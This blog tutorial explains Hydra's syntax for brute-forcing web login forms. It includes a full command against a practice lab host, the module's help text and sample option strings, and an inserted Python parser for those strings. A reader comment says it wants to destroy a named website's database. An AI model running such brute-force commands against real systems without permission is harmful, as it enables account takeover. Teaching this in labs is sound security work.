Tuesday, April 12, 2016

Detailed Explanation of Hydra's Syntax for Web Form Attacks

This article breaks down the syntax we used for Hydra in the article Brute forcing a website login form using Hydra and the video Brute Force Website Login Attack Using Hydra.

In general you can type 'man' followed by the program name to read the manual. Hydra, however, doesn't have a manual page, but just typing 'hydra' will show you the basic info, and 'hydra -h' shows more. One of the best commands for detailed help on a module is the '-U' option followed by the module name. Here are all the modules listed in the basic help:


asterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 teamspeak telnet[s] vmauthd vnc xmpp 
So here is the command I used:
hydra -l root -p 557 -v attack.samsclass.info http-get-form "/brute4.php:login=^USER^&pin=^PASS^:Denied"

To start we have the program name, hydra, followed by -l userName or -L userNameFile.txt. The -l option is for a single login name; -L takes a file of login names. Then we have -p password or -P passwordFile.txt, for a single password or a password file. The -v is optional; it stands for verbose (an option that almost all programs have, and it can come in handy to see what's happening). Verbose just means that it will show you a lot of information that would not normally be shown (you can read more by running hydra -h).

Next we have attack.samsclass.info. This is the domain name we will be attacking; don't include the http:// or https:// and don't include anything past or including the / after the name.

Now we have the service module to run, in this case http-get-form. This tells hydra that it will be attacking an HTTP web form by making a GET request (most forms use POST, just FYI). You can learn a ton more by running 'hydra -U http-get-form'. Here is a quote of what it says:

The parameters take three ":" separated values, plus optional values.
(Note: if you need a colon in the option string as value, escape it with "\:", but do not escape a "\" with "\\".)

Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
First is the page on the server to GET or POST to (URL).
Second is the POST/GET variables (taken from either the browser, proxy, etc.
 with usernames and passwords being replaced in the "^USER^" and "^PASS^"
 placeholders (FORM PARAMETERS)
Third is the string that it checks for an *invalid* login (by default)
 Invalid condition login check can be preceded by "F=", successful condition
 login check must be preceded by "S=".
 This is where most people get it wrong. You have to check the webapp what a
 failed string looks like and put it in this parameter!

Next we have the three required parameters in quotes, separated by a colon ':': "/brute4.php:login=^USER^&pin=^PASS^:Denied". So first is the URL that the form posts to, /brute4.php. Then the posted query string or options, login=^USER^&pin=^PASS^. This is what the form submits; if you look at a form, these would be the names of any input, checkbox etc.

Here we have 'login' and 'pin'. Hydra replaces ^USER^ with the username or the usernames from the username file, and it replaces ^PASS^ with the provided password or the passwords from the password file. Finally we have the third required parameter, Denied. This is the text to look for to know the login failed. In our case it is Denied, but this will be different for different sites. Optionally you can look for a successful login text instead, something that is only shown when you successfully log in. You can do this with 'S=' followed by the text. An example of a successful login text may be the username, as some sites show the username once you log in.

Hopefully this has helped you understand what each part of the syntax we used does. Here is the full help for the http-get-form module:
Help for module http-get-form:
============================================================================
Module http-get-form requires the page and the parameters for the web form.

By default this module is configured to follow a maximum of 5 redirections in
a row. It always gathers a new cookie from the same URL without variables
The parameters take three ":" separated values, plus optional values.
(Note: if you need a colon in the option string as value, escape it with "\:", but do not escape a "\" with "\\".)

Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
First is the page on the server to GET or POST to (URL).
Second is the POST/GET variables (taken from either the browser, proxy, etc.
 with usernames and passwords being replaced in the "^USER^" and "^PASS^"
 placeholders (FORM PARAMETERS)
Third is the string that it checks for an *invalid* login (by default)
 Invalid condition login check can be preceded by "F=", successful condition
 login check must be preceded by "S=".
 This is where most people get it wrong. You have to check the webapp what a
 failed string looks like and put it in this parameter!
The following parameters are optional:
 C=/page/uri     to define a different page to gather initial cookies from
 (h|H)=My-Hdr\: foo   to send a user defined HTTP header with each request
                 ^USER^ and ^PASS^ can also be put into these headers!
                 Note: 'h' will add the user-defined header at the end
                 regardless it's already being sent by Hydra or not.
                 'H' will replace the value of that header if it exists, by the
                 one supplied by the user, or add the header at the end
Note that if you are going to put colons (:) in your headers you should escape them with a backslash (\).
 All colons that are not option separators should be escaped (see the examples above and below).
 You can specify a header without escaping the colons, but that way you will not be able to put colons in the header value itself, as they will be interpreted by hydra as option separators.

Examples:
 "/login.php:user=^USER^&pass=^PASS^:incorrect"
 "/login.php:user=^USER^&pass=^PASS^&colon=colon\:escape:S=authlog=.*success"
 "/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed"
 "/:user=^USER&pass=^PASS^:failed:H=Authorization\: Basic dT1w:H=Cookie\: sessid=aaaa:h=X-User\: ^USER^"
 "/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flags=0&username=<domain>%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb"
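To make the field rules above concrete (the three required fields explained earlier, plus the "\:" escaping and the optional C=, H= and h= fields from the module help), here is an added Python example that is not part of the original post or of Hydra itself: it splits an option string on unescaped colons, classifies each field, and shows the request target one http-get-form attempt produces. The function and class names are my own; the sample strings are the page's command and the examples from the help text.

```python
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

def split_unescaped(option: str) -> List[str]:
    # ':' separates fields; '\:' is a literal colon; any other backslash is kept as-is
    parts, buf, i = [], [], 0
    while i < len(option):
        if option.startswith("\\:", i):
            buf.append(":")
            i += 1               # skip the backslash; the ':' was already appended as data
        elif option[i] == ":":
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(option[i])
        i += 1
    parts.append("".join(buf))
    return parts

@dataclass
class FormSpec:
    url: str                 # page the form is submitted to
    params: str              # form variables with ^USER^ / ^PASS^ placeholders
    condition: str           # text Hydra looks for in the response
    condition_kind: str      # "fail" (default or F=) or "success" (S=)
    cookie_page: Optional[str] = None                                   # C=/page/uri
    headers: List[Tuple[str, str, str]] = field(default_factory=list)   # (h|H, name, value)

def parse_form_option(option: str) -> FormSpec:
    fields = split_unescaped(option)
    if len(fields) < 3:
        raise ValueError("need <url>:<form parameters>:<condition string>")
    url, params, cond = fields[:3]
    kind = "success" if cond.startswith("S=") else "fail"
    if cond[:2] in ("S=", "F="):
        cond = cond[2:]
    spec = FormSpec(url, params, cond, kind)
    for opt in fields[3:]:
        if opt.startswith("C="):
            spec.cookie_page = opt[2:]
        elif opt[:2] in ("H=", "h="):
            name, _, value = opt[2:].partition(":")   # colon here is the unescaped '\:'
            spec.headers.append((opt[0], name.strip(), value.strip()))
        else:
            raise ValueError(f"unknown optional field {opt!r}")
    return spec

def request_target(spec: FormSpec, user: str, password: str) -> str:
    # one http-get-form attempt: the filled-in credentials travel in the query string
    filled = spec.params.replace("^USER^", user).replace("^PASS^", password)
    return f"{spec.url}?{filled}"
```

Because the GET form puts the filled-in login and pin in the query string, every attempt is recorded in the web server's access log, which is what makes this kind of guessing easy to spot on the defending side.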

2 comments:

  1. Hello
    There are 2 persons in Egypt who are stealing and bluffing the people around the world with their websites.
    www.gn4m.com specially. I am dying to do something about these people, at least to destroy his database. I have all the proof but in Arabic, and if you want to help I can translate it for you.
    I will try to follow your steps.
    fadishaya@gmail.com
    Thank you
